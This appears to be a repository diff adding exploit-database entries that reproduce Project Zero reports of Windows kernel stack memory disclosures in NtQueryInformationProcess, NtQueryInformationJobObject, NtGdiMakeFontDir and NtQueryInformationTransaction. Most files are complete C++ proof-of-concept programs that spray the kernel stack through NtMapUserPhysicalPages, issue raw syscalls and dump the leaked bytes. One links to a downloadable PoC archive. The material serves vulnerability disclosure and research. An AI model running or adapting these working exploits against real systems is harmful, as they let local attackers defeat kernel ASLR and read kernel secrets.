||||||
|
printf("NtQueryInformationJobObject#1 failed, %x\n", st);
|
||||||
|
CloseHandle(hJob);
|
||||||
|
return 1;
|
||||||
|
}
|
||||||
|
|
||||||
|
// Print out the output.
|
||||||
|
printf("JobObjectBasicLimitInformation:\n");
|
||||||
|
PrintHex(output, ReturnLength);
|
||||||
|
|
||||||
|
// Spray the kernel again before invoking the affected system call.
|
||||||
|
SprayKernelStack();
|
||||||
|
|
||||||
|
// Trigger the bug in nt!NtQueryInformationJobObject(JobObjectExtendedLimitInformation), buffer size 112.
|
||||||
|
ZeroMemory(output, sizeof(output));
|
||||||
|
|
||||||
|
st = SystemCall32(__NR_NtQueryInformationJobObject, hJob, JobObjectExtendedLimitInformation, output, 112, &ReturnLength);
|
||||||
|
if (!NT_SUCCESS(st)) {
|
||||||
|
printf("NtQueryInformationJobObject#2 failed, %x\n", st);
|
||||||
|
CloseHandle(hJob);
|
||||||
|
return 1;
|
||||||
|
}
|
||||||
|
|
||||||
|
// Print the output again.
|
||||||
|
printf("JobObjectExtendedLimitInformation (112):\n");
|
||||||
|
PrintHex(output, ReturnLength);
|
||||||
|
|
||||||
|
// Spray the kernel again before invoking the affected system call.
|
||||||
|
SprayKernelStack();
|
||||||
|
|
||||||
|
// Trigger the bug in nt!NtQueryInformationJobObject(JobObjectExtendedLimitInformation), buffer size 120.
|
||||||
|
ZeroMemory(output, sizeof(output));
|
||||||
|
|
||||||
|
st = SystemCall32(__NR_NtQueryInformationJobObject, hJob, JobObjectExtendedLimitInformation, output, 120, &ReturnLength);
|
||||||
|
if (!NT_SUCCESS(st)) {
|
||||||
|
printf("NtQueryInformationJobObject#2 failed, %x\n", st);
|
||||||
|
CloseHandle(hJob);
|
||||||
|
return 1;
|
||||||
|
}
|
||||||
|
|
||||||
|
// Print the output again.
|
||||||
|
printf("JobObjectExtendedLimitInformation (120):\n");
|
||||||
|
PrintHex(output, ReturnLength);
|
||||||
|
|
||||||
|
// Free resources.
|
||||||
|
CloseHandle(hJob);
|
||||||
|
|
||||||
|
return 0;
|
||||||
|
}
|
||||||
148
platforms/windows/dos/42229.cpp
Executable file
148
platforms/windows/dos/42229.cpp
Executable file
|
|
@ -0,0 +1,148 @@
|
||||||
|
/*
|
||||||
|
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1190&desc=2
|
||||||
|
|
||||||
|
We have discovered that the nt!NtQueryInformationProcess system call called with the ProcessVmCounters information class discloses portions of uninitialized kernel stack memory to user-mode clients, due to output structure alignment holes.
|
||||||
|
|
||||||
|
On our test Windows 10 32-bit workstation, an example layout of the output buffer is as follows:
|
||||||
|
|
||||||
|
--- cut ---
|
||||||
|
00000000: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
|
||||||
|
00000010: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
|
||||||
|
00000020: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
|
||||||
|
00000030: 00 00 00 00 ff ff ff ff 00 00 00 00 00 00 00 00 ................
|
||||||
|
--- cut ---
|
||||||
|
|
||||||
|
Where 00 denote bytes which are properly initialized, while ff indicate uninitialized values copied back to user-mode. The output data can be returned in a VM_COUNTERS_EX2 structure:
|
||||||
|
|
||||||
|
--- cut ---
|
||||||
|
typedef struct _VM_COUNTERS_EX {
|
||||||
|
SIZE_T PeakVirtualSize;
|
||||||
|
SIZE_T VirtualSize;
|
||||||
|
ULONG PageFaultCount;
|
||||||
|
SIZE_T PeakWorkingSetSize;
|
||||||
|
SIZE_T WorkingSetSize;
|
||||||
|
SIZE_T QuotaPeakPagedPoolUsage;
|
||||||
|
SIZE_T QuotaPagedPoolUsage;
|
||||||
|
SIZE_T QuotaPeakNonPagedPoolUsage;
|
||||||
|
SIZE_T QuotaNonPagedPoolUsage;
|
||||||
|
SIZE_T PagefileUsage;
|
||||||
|
SIZE_T PeakPagefileUsage;
|
||||||
|
SIZE_T PrivateUsage;
|
||||||
|
} VM_COUNTERS_EX;
|
||||||
|
|
||||||
|
typedef struct _VM_COUNTERS_EX2 {
|
||||||
|
VM_COUNTERS_EX CountersEx;
|
||||||
|
SIZE_T PrivateWorkingSetSize;
|
||||||
|
ULONGLONG SharedCommitUsage;
|
||||||
|
} VM_COUNTERS_EX2, *PVM_COUNTERS_EX2;
|
||||||
|
--- cut ---
|
||||||
|
|
||||||
|
If we map the above shadow bytes to the structure definition, it turns out that the uninitialized bytes correspond to the alignment hole between the PrivateWorkingSetSize and SharedCommitUsage fields. The PrivateWorkingSetSize field ends at offset 0x34 of the structure, while SharedCommitUsage must be 8-byte aligned, causing a gap to be introduced at offsets 0x34-0x37, which is not initialized by the kernel prior to being copied back to the client application.
|
||||||
|
|
||||||
|
The attached proof of concept code works by first filling a large portion of the kernel stack with a controlled marker byte 0x41 ('A') using the nt!NtMapUserPhysicalPages system call, and then invokes the affected nt!NtQueryInformationProcess syscall. As a result, we can observe that these leftover bytes are indeed leaked to user-mode at offset 0x34 of the output structure:
|
||||||
|
|
||||||
|
--- cut ---
|
||||||
|
00000000: 00 50 a8 00 00 50 a8 00 9b 01 00 00 00 00 19 00 .P...P..........
|
||||||
|
00000010: 00 00 19 00 48 45 00 00 98 44 00 00 30 0a 00 00 ....HE...D..0...
|
||||||
|
00000020: 00 05 00 00 00 d0 05 00 00 c0 06 00 00 d0 05 00 ................
|
||||||
|
00000030: 00 30 02 00[41 41 41 41]00 30 05 00 00 00 00 00 .0..AAAA.0......
|
||||||
|
--- cut ---
|
||||||
|
|
||||||
|
Repeatedly triggering the vulnerability could allow local authenticated attackers to defeat certain exploit mitigations (kernel ASLR) or read other secrets stored in the kernel address space.
|
||||||
|
*/
|
||||||
|
|
||||||
|
#include <Windows.h>
|
||||||
|
#include <winternl.h>
|
||||||
|
#include <cstdio>
|
||||||
|
|
||||||
|
#define ProcessVmCounters ((PROCESSINFOCLASS)3)
|
||||||
|
|
||||||
|
typedef struct _VM_COUNTERS_EX {
|
||||||
|
SIZE_T PeakVirtualSize;
|
||||||
|
SIZE_T VirtualSize;
|
||||||
|
ULONG PageFaultCount;
|
||||||
|
SIZE_T PeakWorkingSetSize;
|
||||||
|
SIZE_T WorkingSetSize;
|
||||||
|
SIZE_T QuotaPeakPagedPoolUsage;
|
||||||
|
SIZE_T QuotaPagedPoolUsage;
|
||||||
|
SIZE_T QuotaPeakNonPagedPoolUsage;
|
||||||
|
SIZE_T QuotaNonPagedPoolUsage;
|
||||||
|
SIZE_T PagefileUsage;
|
||||||
|
SIZE_T PeakPagefileUsage;
|
||||||
|
SIZE_T PrivateUsage;
|
||||||
|
} VM_COUNTERS_EX;
|
||||||
|
|
||||||
|
typedef struct _VM_COUNTERS_EX2 {
|
||||||
|
VM_COUNTERS_EX CountersEx;
|
||||||
|
SIZE_T PrivateWorkingSetSize;
|
||||||
|
ULONGLONG SharedCommitUsage;
|
||||||
|
} VM_COUNTERS_EX2, *PVM_COUNTERS_EX2;
|
||||||
|
|
||||||
|
extern "C"
|
||||||
|
ULONG WINAPI NtMapUserPhysicalPages(
|
||||||
|
PVOID BaseAddress,
|
||||||
|
ULONG NumberOfPages,
|
||||||
|
PULONG PageFrameNumbers
|
||||||
|
);
|
||||||
|
|
||||||
|
VOID PrintHex(PBYTE Data, ULONG dwBytes) {
|
||||||
|
for (ULONG i = 0; i < dwBytes; i += 16) {
|
||||||
|
printf("%.8x: ", i);
|
||||||
|
|
||||||
|
for (ULONG j = 0; j < 16; j++) {
|
||||||
|
if (i + j < dwBytes) {
|
||||||
|
printf("%.2x ", Data[i + j]);
|
||||||
|
}
|
||||||
|
else {
|
||||||
|
printf("?? ");
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
for (ULONG j = 0; j < 16; j++) {
|
||||||
|
if (i + j < dwBytes && Data[i + j] >= 0x20 && Data[i + j] <= 0x7e) {
|
||||||
|
printf("%c", Data[i + j]);
|
||||||
|
}
|
||||||
|
else {
|
||||||
|
printf(".");
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
printf("\n");
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
VOID MyMemset(PBYTE ptr, BYTE byte, ULONG size) {
|
||||||
|
for (ULONG i = 0; i < size; i++) {
|
||||||
|
ptr[i] = byte;
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
VOID SprayKernelStack() {
|
||||||
|
// Buffer allocated in static program memory, hence doesn't touch the local stack.
|
||||||
|
static BYTE buffer[4096];
|
||||||
|
|
||||||
|
// Fill the buffer with 'A's and spray the kernel stack.
|
||||||
|
MyMemset(buffer, 'A', sizeof(buffer));
|
||||||
|
NtMapUserPhysicalPages(buffer, sizeof(buffer) / sizeof(DWORD), (PULONG)buffer);
|
||||||
|
|
||||||
|
// Make sure that we're really not touching any user-mode stack by overwriting the buffer with 'B's.
|
||||||
|
MyMemset(buffer, 'B', sizeof(buffer));
|
||||||
|
}
|
||||||
|
|
||||||
|
int main() {
|
||||||
|
VM_COUNTERS_EX2 counters;
|
||||||
|
ZeroMemory(&counters, sizeof(counters));
|
||||||
|
|
||||||
|
SprayKernelStack();
|
||||||
|
|
||||||
|
DWORD ReturnLength;
|
||||||
|
NTSTATUS st = NtQueryInformationProcess(GetCurrentProcess(), ProcessVmCounters, &counters, sizeof(counters), &ReturnLength);
|
||||||
|
if (!NT_SUCCESS(st)) {
|
||||||
|
printf("NtQueryInformationProcess failed, %x\n", st);
|
||||||
|
return 1;
|
||||||
|
}
|
||||||
|
|
||||||
|
PrintHex((PBYTE)&counters, ReturnLength);
|
||||||
|
|
||||||
|
return 0;
|
||||||
|
}
|
||||||
32
platforms/windows/dos/42230.txt
Executable file
32
platforms/windows/dos/42230.txt
Executable file
|
|
@ -0,0 +1,32 @@
|
||||||
|
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1191
|
||||||
|
|
||||||
|
We have discovered that the win32k!NtGdiMakeFontDir system call discloses large portions of uninitialized kernel stack memory to user-mode clients.
|
||||||
|
|
||||||
|
The attached proof of concept code (which is specific to Windows 7 32-bit) works by first filling a large portion of the kernel stack with a controlled marker byte 0x41 ('A') using the nt!NtMapUserPhysicalPages system call, and then invoking the affected win32k!NtGdiMakeFontDir syscall. As a result, we can observe that a number of leftover bytes from the stack are indeed leaked to user-mode via the output structure:
|
||||||
|
|
||||||
|
--- cut ---
|
||||||
|
00000000: 01 00 00 00 00 02 95 00 00 00 57 69 6e 64 6f 77 ..........Window
|
||||||
|
00000010: 73 21 20 57 69 6e 64 6f 77 73 21 20 57 69 6e 64 s! Windows! Wind
|
||||||
|
00000020: 6f 77 73 21 00 10 03 01 01 00 00 00 00 00 00 00 ows!............
|
||||||
|
00000030: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
|
||||||
|
00000040: 00 00 00 00 00 00 03 40 00 08 48 00 48 00 66 06 .......@..H.H.f.
|
||||||
|
00000050: 00 00 1b 02 00 00 00 f4 01 00 00 00 00 08 07 e8 ................
|
||||||
|
00000060: 03 86 02 1f a8 01 02 00 00 00 00 00 00 76 00 00 .............v..
|
||||||
|
00000070: 00 08 00 00 00 41 77 69 6e 65 5f 74 65 73 74 00 .....Awine_test.
|
||||||
|
00000080: 77 69 6e 65 5f 74 65 73 74 00 4d 65 64 69 75 6d wine_test.Medium
|
||||||
|
00000090: 00 41 41 41 41 00 41 41 41 41 41 41 41 41 41 41 .AAAA.AAAAAAAAAA
|
||||||
|
000000a0: 41 41 41 41 41 41 41 41 41 00 41 41 41 41 41 41 AAAAAAAAA.AAAAAA
|
||||||
|
000000b0: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 00 AAAAAAAAAAAAAAA.
|
||||||
|
000000c0: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
|
||||||
|
000000d0: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
|
||||||
|
000000e0: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
|
||||||
|
000000f0: 41 41 41 41 41 41 41 41 41 41 41 ?? ?? ?? ?? ?? AAAAAAAAAAA.....
|
||||||
|
--- cut ---
|
||||||
|
|
||||||
|
In order for the PoC program to work, the attached wine_test.ttf font must be present in the current working directory.
|
||||||
|
|
||||||
|
Repeatedly triggering the vulnerability could allow local authenticated attackers to defeat certain exploit mitigations (kernel ASLR) or read other secrets stored in the kernel address space.
|
||||||
|
|
||||||
|
|
||||||
|
Proof of Concept:
|
||||||
|
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42230.zip
|
||||||
136
platforms/windows/dos/42231.cpp
Executable file
136
platforms/windows/dos/42231.cpp
Executable file
|
|
@ -0,0 +1,136 @@
|
||||||
|
/*
|
||||||
|
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1193
|
||||||
|
|
||||||
|
We have discovered that the nt!NtQueryInformationJobObject system call (corresponding to the documented QueryInformationJobObject() API function) called with the 12 information class discloses portions of uninitialized kernel stack memory to user-mode clients.
|
||||||
|
|
||||||
|
The specific name of the 12 information class or the layout of the corresponding output buffer are unknown to us; however, we have determined that on Windows 10 1607 32-bit, output sizes of 48 and 56 bytes are accepted. In both cases, 4 uninitialized kernel stack bytes are leaked at the end of the structure (at offsets of 0x2C or 0x34, respectively).
|
||||||
|
|
||||||
|
The attached proof-of-concept program demonstrates both disclosures by spraying the kernel stack with a large number of 0x41 ('A') marker bytes, and then calling the affected system call with infoclass=12 and the allowed output sizes. An example output is as follows:
|
||||||
|
|
||||||
|
--- cut ---
|
||||||
|
Class 12, output length 48:
|
||||||
|
00000000: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
|
||||||
|
00000010: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
|
||||||
|
00000020: 00 00 00 00 00 00 00 00 00 00 00 00 41 41 41 41 ............AAAA
|
||||||
|
Class 12, output length 56:
|
||||||
|
00000000: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
|
||||||
|
00000010: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
|
||||||
|
00000020: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
|
||||||
|
00000030: 00 00 00 00 41 41 41 41 ?? ?? ?? ?? ?? ?? ?? ?? ....AAAA........
|
||||||
|
--- cut ---
|
||||||
|
|
||||||
|
It is clearly visible here that in both responses, 4 bytes copied from ring-0 to ring-3 remained uninitialized.
|
||||||
|
|
||||||
|
Repeatedly triggering the vulnerability could allow local authenticated attackers to defeat certain exploit mitigations (kernel ASLR) or read other secrets stored in the kernel address space.
|
||||||
|
*/
|
||||||
|
|
||||||
|
#include <Windows.h>
|
||||||
|
#include <winternl.h>
|
||||||
|
#include <cstdio>
|
||||||
|
|
||||||
|
extern "C"
|
||||||
|
ULONG WINAPI NtMapUserPhysicalPages(
|
||||||
|
PVOID BaseAddress,
|
||||||
|
ULONG NumberOfPages,
|
||||||
|
PULONG PageFrameNumbers
|
||||||
|
);
|
||||||
|
|
||||||
|
// For native 32-bit execution.
|
||||||
|
extern "C"
|
||||||
|
ULONG CDECL SystemCall32(DWORD ApiNumber, ...) {
|
||||||
|
__asm{mov eax, ApiNumber};
|
||||||
|
__asm{lea edx, ApiNumber + 4};
|
||||||
|
__asm{int 0x2e};
|
||||||
|
}
|
||||||
|
|
||||||
|
VOID PrintHex(PBYTE Data, ULONG dwBytes) {
|
||||||
|
for (ULONG i = 0; i < dwBytes; i += 16) {
|
||||||
|
printf("%.8x: ", i);
|
||||||
|
|
||||||
|
for (ULONG j = 0; j < 16; j++) {
|
||||||
|
if (i + j < dwBytes) {
|
||||||
|
printf("%.2x ", Data[i + j]);
|
||||||
|
}
|
||||||
|
else {
|
||||||
|
printf("?? ");
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
for (ULONG j = 0; j < 16; j++) {
|
||||||
|
if (i + j < dwBytes && Data[i + j] >= 0x20 && Data[i + j] <= 0x7e) {
|
||||||
|
printf("%c", Data[i + j]);
|
||||||
|
}
|
||||||
|
else {
|
||||||
|
printf(".");
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
printf("\n");
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
VOID MyMemset(PBYTE ptr, BYTE byte, ULONG size) {
|
||||||
|
for (ULONG i = 0; i < size; i++) {
|
||||||
|
ptr[i] = byte;
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
VOID SprayKernelStack() {
|
||||||
|
// Buffer allocated in static program memory, hence doesn't touch the local stack.
|
||||||
|
static BYTE buffer[4096];
|
||||||
|
|
||||||
|
// Fill the buffer with 'A's and spray the kernel stack.
|
||||||
|
MyMemset(buffer, 'A', sizeof(buffer));
|
||||||
|
NtMapUserPhysicalPages(buffer, sizeof(buffer) / sizeof(DWORD), (PULONG)buffer);
|
||||||
|
|
||||||
|
// Make sure that we're really not touching any user-mode stack by overwriting the buffer with 'B's.
|
||||||
|
MyMemset(buffer, 'B', sizeof(buffer));
|
||||||
|
}
|
||||||
|
|
||||||
|
int main() {
|
||||||
|
// Windows 10 1607 32-bit.
|
||||||
|
CONST ULONG __NR_NtQueryInformationJobObject = 0x00b9;
|
||||||
|
|
||||||
|
// Create a job object to operate on.
|
||||||
|
HANDLE hJob = CreateJobObject(NULL, NULL);
|
||||||
|
|
||||||
|
// Spray the kernel stack with a marker value, to get visible results.
|
||||||
|
SprayKernelStack();
|
||||||
|
|
||||||
|
// Trigger the bug in nt!NtQueryInformationJobObject(class 12, output length 48).
|
||||||
|
DWORD ReturnLength = 0;
|
||||||
|
BYTE output[56] = { /* zero padding */ };
|
||||||
|
|
||||||
|
NTSTATUS st = SystemCall32(__NR_NtQueryInformationJobObject, hJob, 12, output, 48, &ReturnLength);
|
||||||
|
if (!NT_SUCCESS(st)) {
|
||||||
|
printf("NtQueryInformationJobObject#1 failed, %x\n", st);
|
||||||
|
CloseHandle(hJob);
|
||||||
|
return 1;
|
||||||
|
}
|
||||||
|
|
||||||
|
// Print out the output.
|
||||||
|
printf("Class 12, output length 48:\n");
|
||||||
|
PrintHex(output, ReturnLength);
|
||||||
|
|
||||||
|
// Spray the kernel again before invoking the affected system call.
|
||||||
|
SprayKernelStack();
|
||||||
|
|
||||||
|
// Trigger the bug in nt!NtQueryInformationJobObject(class 12, output length 56).
|
||||||
|
ZeroMemory(output, sizeof(output));
|
||||||
|
|
||||||
|
st = SystemCall32(__NR_NtQueryInformationJobObject, hJob, 12, output, 56, &ReturnLength);
|
||||||
|
if (!NT_SUCCESS(st)) {
|
||||||
|
printf("NtQueryInformationJobObject#2 failed, %x\n", st);
|
||||||
|
CloseHandle(hJob);
|
||||||
|
return 1;
|
||||||
|
}
|
||||||
|
|
||||||
|
// Print the output again.
|
||||||
|
printf("Class 12, output length 56:\n");
|
||||||
|
PrintHex(output, ReturnLength);
|
||||||
|
|
||||||
|
// Free resources.
|
||||||
|
CloseHandle(hJob);
|
||||||
|
|
||||||
|
return 0;
|
||||||
|
}
|
||||||
112
platforms/windows/dos/42232.cpp
Executable file
112
platforms/windows/dos/42232.cpp
Executable file
|
|
@ -0,0 +1,112 @@
|
||||||
|
/*
|
||||||
|
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1194
|
||||||
|
|
||||||
|
We have discovered that the nt!NtQueryInformationJobObject system call (corresponding to the documented QueryInformationJobObject() API function) called with the 28 information class discloses portions of uninitialized kernel stack memory to user-mode clients.
|
||||||
|
|
||||||
|
The specific name of the 28 information class or the layout of the corresponding output buffer are unknown to us; however, we have determined that on Windows 10 1607 32-bit, an output size of 40 bytes is accepted. At the end of that memory area, 16 uninitialized bytes from the kernel stack are leaked to the client application.
|
||||||
|
|
||||||
|
The attached proof-of-concept program demonstrates the disclosure by spraying the kernel stack with a large number of 0x41 ('A') marker bytes, and then calling the affected system call with infoclass=28 and the allowed output size. An example output is as follows:
|
||||||
|
|
||||||
|
--- cut ---
|
||||||
|
00000000: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
|
||||||
|
00000010: 00 00 00 00 00 00 00 00 41 41 41 41 41 41 41 41 ........AAAAAAAA
|
||||||
|
00000020: 41 41 41 41 41 41 41 41 ?? ?? ?? ?? ?? ?? ?? ?? AAAAAAAA........
|
||||||
|
--- cut ---
|
||||||
|
|
||||||
|
It is clearly visible here that 16 bytes copied from ring-0 to ring-3 remained uninitialized. If the stack spraying function call is commented out, raw kernel pointers can be observed in the output.
|
||||||
|
|
||||||
|
Repeatedly triggering the vulnerability could allow local authenticated attackers to defeat certain exploit mitigations (kernel ASLR) or read other secrets stored in the kernel address space.
|
||||||
|
*/
|
||||||
|
|
||||||
|
#include <Windows.h>
|
||||||
|
#include <winternl.h>
|
||||||
|
#include <cstdio>
|
||||||
|
|
||||||
|
extern "C"
|
||||||
|
ULONG WINAPI NtMapUserPhysicalPages(
|
||||||
|
PVOID BaseAddress,
|
||||||
|
ULONG NumberOfPages,
|
||||||
|
PULONG PageFrameNumbers
|
||||||
|
);
|
||||||
|
|
||||||
|
// For native 32-bit execution.
|
||||||
|
extern "C"
|
||||||
|
ULONG CDECL SystemCall32(DWORD ApiNumber, ...) {
|
||||||
|
__asm{mov eax, ApiNumber};
|
||||||
|
__asm{lea edx, ApiNumber + 4};
|
||||||
|
__asm{int 0x2e};
|
||||||
|
}
|
||||||
|
|
||||||
|
VOID PrintHex(PBYTE Data, ULONG dwBytes) {
|
||||||
|
for (ULONG i = 0; i < dwBytes; i += 16) {
|
||||||
|
printf("%.8x: ", i);
|
||||||
|
|
||||||
|
for (ULONG j = 0; j < 16; j++) {
|
||||||
|
if (i + j < dwBytes) {
|
||||||
|
printf("%.2x ", Data[i + j]);
|
||||||
|
}
|
||||||
|
else {
|
||||||
|
printf("?? ");
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
for (ULONG j = 0; j < 16; j++) {
|
||||||
|
if (i + j < dwBytes && Data[i + j] >= 0x20 && Data[i + j] <= 0x7e) {
|
||||||
|
printf("%c", Data[i + j]);
|
||||||
|
}
|
||||||
|
else {
|
||||||
|
printf(".");
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
printf("\n");
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
VOID MyMemset(PBYTE ptr, BYTE byte, ULONG size) {
|
||||||
|
for (ULONG i = 0; i < size; i++) {
|
||||||
|
ptr[i] = byte;
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
VOID SprayKernelStack() {
|
||||||
|
// Buffer allocated in static program memory, hence doesn't touch the local stack.
|
||||||
|
static BYTE buffer[4096];
|
||||||
|
|
||||||
|
// Fill the buffer with 'A's and spray the kernel stack.
|
||||||
|
MyMemset(buffer, 'A', sizeof(buffer));
|
||||||
|
NtMapUserPhysicalPages(buffer, sizeof(buffer) / sizeof(DWORD), (PULONG)buffer);
|
||||||
|
|
||||||
|
// Make sure that we're really not touching any user-mode stack by overwriting the buffer with 'B's.
|
||||||
|
MyMemset(buffer, 'B', sizeof(buffer));
|
||||||
|
}
|
||||||
|
|
||||||
|
int main() {
|
||||||
|
// Windows 10 1607 32-bit.
|
||||||
|
CONST ULONG __NR_NtQueryInformationJobObject = 0x00b9;
|
||||||
|
|
||||||
|
// Create a job object to operate on.
|
||||||
|
HANDLE hJob = CreateJobObject(NULL, NULL);
|
||||||
|
|
||||||
|
// Spray the kernel stack with a marker value, to get visible results.
|
||||||
|
SprayKernelStack();
|
||||||
|
|
||||||
|
// Trigger the bug in nt!NtQueryInformationJobObject(class 28, output length 40).
|
||||||
|
DWORD ReturnLength = 0;
|
||||||
|
BYTE output[40] = { /* zero padding */ };
|
||||||
|
|
||||||
|
NTSTATUS st = SystemCall32(__NR_NtQueryInformationJobObject, hJob, 28, output, sizeof(output), &ReturnLength);
|
||||||
|
if (!NT_SUCCESS(st)) {
|
||||||
|
printf("NtQueryInformationJobObject failed, %x\n", st);
|
||||||
|
CloseHandle(hJob);
|
||||||
|
return 1;
|
||||||
|
}
|
||||||
|
|
||||||
|
// Print out the output.
|
||||||
|
PrintHex(output, ReturnLength);
|
||||||
|
|
||||||
|
// Free resources.
|
||||||
|
CloseHandle(hJob);
|
||||||
|
|
||||||
|
return 0;
|
||||||
|
}
|
||||||
109
platforms/windows/dos/42233.cpp
Executable file
109
platforms/windows/dos/42233.cpp
Executable file
|
|
@ -0,0 +1,109 @@
|
||||||
|
/*
|
||||||
|
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1196
|
||||||
|
|
||||||
|
We have discovered that the nt!NtQueryInformationTransaction system call called with the 1 information class discloses portions of uninitialized kernel stack memory to user-mode clients, on Windows 7 to Windows 10.
|
||||||
|
|
||||||
|
The specific name of the 1 information class or the layout of the corresponding output buffer are unknown to us; however, we have determined that on 32-bit Windows platforms, an output size of 32 bytes and more is accepted. At the end of that memory area, 6 uninitialized bytes from the kernel stack can be leaked to the client application.
|
||||||
|
|
||||||
|
The attached proof-of-concept program (specific to Windows 10 1607 32-bit) demonstrates the disclosure by spraying the kernel stack with a large number of 0x41 ('A') marker bytes, and then calling the affected system call with infoclass=1 and the allowed output size. An example output is as follows:
|
||||||
|
|
||||||
|
--- cut ---
|
||||||
|
00000000: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
|
||||||
|
00000010: 01 00 00 00 00 00 00 00 00 00 41 41 41 41 41 41 ..........AAAAAA
|
||||||
|
--- cut ---
|
||||||
|
|
||||||
|
It is clearly visible here that 6 bytes copied from ring-0 to ring-3 remained uninitialized. Repeatedly triggering the vulnerability could allow local authenticated attackers to defeat certain exploit mitigations (kernel ASLR) or read other secrets stored in the kernel address space.
|
||||||
|
*/
|
||||||
|
|
||||||
|
#include <Windows.h>
|
||||||
|
#include <winternl.h>
|
||||||
|
#include <KtmW32.h>
|
||||||
|
#include <cstdio>
|
||||||
|
|
||||||
|
extern "C"
|
||||||
|
ULONG WINAPI NtMapUserPhysicalPages(
|
||||||
|
PVOID BaseAddress,
|
||||||
|
ULONG NumberOfPages,
|
||||||
|
PULONG PageFrameNumbers
|
||||||
|
);
|
||||||
|
|
||||||
|
// For native 32-bit execution.
|
||||||
|
extern "C"
|
||||||
|
ULONG CDECL SystemCall32(DWORD ApiNumber, ...) {
|
||||||
|
__asm{mov eax, ApiNumber};
|
||||||
|
__asm{lea edx, ApiNumber + 4};
|
||||||
|
__asm{int 0x2e};
|
||||||
|
}
|
||||||
|
|
||||||
|
VOID PrintHex(PBYTE Data, ULONG dwBytes) {
|
||||||
|
for (ULONG i = 0; i < dwBytes; i += 16) {
|
||||||
|
printf("%.8x: ", i);
|
||||||
|
|
||||||
|
for (ULONG j = 0; j < 16; j++) {
|
||||||
|
if (i + j < dwBytes) {
|
||||||
|
printf("%.2x ", Data[i + j]);
|
||||||
|
}
|
||||||
|
else {
|
||||||
|
printf("?? ");
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
for (ULONG j = 0; j < 16; j++) {
|
||||||
|
if (i + j < dwBytes && Data[i + j] >= 0x20 && Data[i + j] <= 0x7e) {
|
||||||
|
printf("%c", Data[i + j]);
|
||||||
|
}
|
||||||
|
else {
|
||||||
|
printf(".");
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
printf("\n");
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
VOID MyMemset(PBYTE ptr, BYTE byte, ULONG size) {
|
||||||
|
for (ULONG i = 0; i < size; i++) {
|
||||||
|
ptr[i] = byte;
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
VOID SprayKernelStack() {
|
||||||
|
// Buffer allocated in static program memory, hence doesn't touch the local stack.
|
||||||
|
static BYTE buffer[4096];
|
||||||
|
|
||||||
|
// Fill the buffer with 'A's and spray the kernel stack.
|
||||||
|
MyMemset(buffer, 'A', sizeof(buffer));
|
||||||
|
NtMapUserPhysicalPages(buffer, sizeof(buffer) / sizeof(DWORD), (PULONG)buffer);
|
||||||
|
|
||||||
|
// Make sure that we're really not touching any user-mode stack by overwriting the buffer with 'B's.
|
||||||
|
MyMemset(buffer, 'B', sizeof(buffer));
|
||||||
|
}
|
||||||
|
|
||||||
|
int main() {
|
||||||
|
// Windows 10 1607 32-bit.
|
||||||
|
CONST ULONG __NR_NtQueryInformationTransaction = 0x00b3;
|
||||||
|
|
||||||
|
// Create an empty transaction.
|
||||||
|
HANDLE hTransaction = CreateTransaction(NULL, NULL, 0, 0, 0, 0, NULL);
|
||||||
|
|
||||||
|
// Spray the kernel stack to get visible results.
|
||||||
|
SprayKernelStack();
|
||||||
|
|
||||||
|
// Trigger the vulnerability and print out the output structure.
|
||||||
|
BYTE output[32] = { /* zero padding */ };
|
||||||
|
DWORD ReturnLength;
|
||||||
|
NTSTATUS st = SystemCall32(__NR_NtQueryInformationTransaction, hTransaction, 1, output, sizeof(output), &ReturnLength);
|
||||||
|
|
||||||
|
if (!NT_SUCCESS(st)) {
|
||||||
|
printf("NtQueryInformationTransaction failed, %x\n", st);
|
||||||
|
CloseHandle(hTransaction);
|
||||||
|
return 1;
|
||||||
|
}
|
||||||
|
|
||||||
|
PrintHex(output, ReturnLength);
|
||||||
|
|
||||||
|
// Free resources.
|
||||||
|
CloseHandle(hTransaction);
|
||||||
|
|
||||||
|
return 0;
|
||||||
|
}
|
||||||
Loading…
Add table
Reference in a new issue